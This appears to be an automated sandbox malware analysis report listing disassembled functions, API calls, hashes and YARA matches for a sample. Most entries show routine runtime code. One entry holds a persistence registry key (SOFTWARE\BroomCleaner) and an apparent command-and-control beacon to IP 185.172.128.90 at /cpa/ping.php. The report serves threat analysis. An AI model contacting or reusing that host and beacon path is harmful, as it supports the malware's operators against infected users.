                                                                                                                                                                                                                                      • Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                        • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                                                                                      • Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                                      • Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                                      • Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                                      • Instruction ID: f46027c18b38fb15bdf5992ad4a39adfe2e29c1104746947a926303fbddba07e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7161B675944205EFEB20DFA4D8C1BDABBF5EF44720F1441AADD64EB260DB70B9428B90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                                      • API String ID: 3033488037-2386870291
                                                                                                                                                                                                                                      • Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                                      • Instruction ID: 871a7b7021d6e8c3a2b93d804c038ba3cfd9cff0c6eed3daf44ff7fe688f04ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B51B171A00204EFEB24DF69D8C1BAA77F4EF49724B5445A9EC69DB260E731F941CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                      • Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                                      • Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,041563EF,?,?,?,?,?,?), ref: 04155CBC
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 04155D37
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 04155D52
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04155D78
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,041563EF,00000000,?,?,?,?,?,?,?,?,?,041563EF,?), ref: 04155D97
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,041563EF,00000000,?,?,?,?,?,?,?,?,?,041563EF,?), ref: 04155DD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                      • Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                                      • Instruction ID: ea1eba185b35037ecad8f2cc2ec4a8ecf7ebea9474038638c9921af284310b9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD51B771A00249EFDB10CFA8D8C5BEEBBF5EF09310F14415AE965E7261D730A951CBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0040A6FB
                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0040A791
                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0040A811
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                      • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                                      • Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 041663C6
                                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 041663EE
                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 04166471
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04166492
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                      • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                      • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                      • Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                                      • Instruction ID: 47c016cab9ad86bf42bb3fd59527e17c115a04439f697807e6a6849c76fad204
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0319A71A00219EFDF149FA8CC90AFEBB79FB48258F04016DE80277241D7716E46CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
                                                                                                                                                                                                                                      • Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F2FA
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                        • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F305
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F310
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F364
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F36F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F37A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0041F385
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                                      • Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0415F25A: _free.LIBCMT ref: 0415F283
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F561
                                                                                                                                                                                                                                        • Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
                                                                                                                                                                                                                                        • Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F56C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F577
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F5CB
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F5D6
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F5E1
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0415F5EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                                      • Instruction ID: f2ff023f2e556f81bc165f0ac4737a3cde7766512c9a019b91f434d6123ae12c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A71154B2550704EAEA30B7B0DCCAFCB7BDD6F44704F800815AEBE6A070DB65F5054A91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 041443F5
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 04144404
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 0414441B
                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 04144424
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 04144455
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0414446B
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 04144491
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                                      • Instruction ID: e4fa42ba376180d7027d0a68188b567f6a38781c353bd841ee0cc474e0d31ca3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11E7729001189BDB04EBA4DC84BEE7775EFC4328F15455AE825B7290DB74BE01CBE0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
                                                                                                                                                                                                                                      • Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                        • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
                                                                                                                                                                                                                                      • Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 04143656
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 04143665
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 0414367C
                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
                                                                                                                                                                                                                                        • Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA
                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 04143685
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 041436B6
                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 041436CC
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 041436F2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1202896665-0
                                                                                                                                                                                                                                      • Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                                      • Instruction ID: 4189a2b6a23253f8f8a61fc8b40c022aef465e1254ede7bc318af57befe0617e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1311A372E00129ABDB05EFA4C884AEE7775EFC4324F15055AE835B72D0DB74AA04CBD4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 04143861
                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 04143870
                                                                                                                                                                                                                                      • int.LIBCPMT ref: 04143887
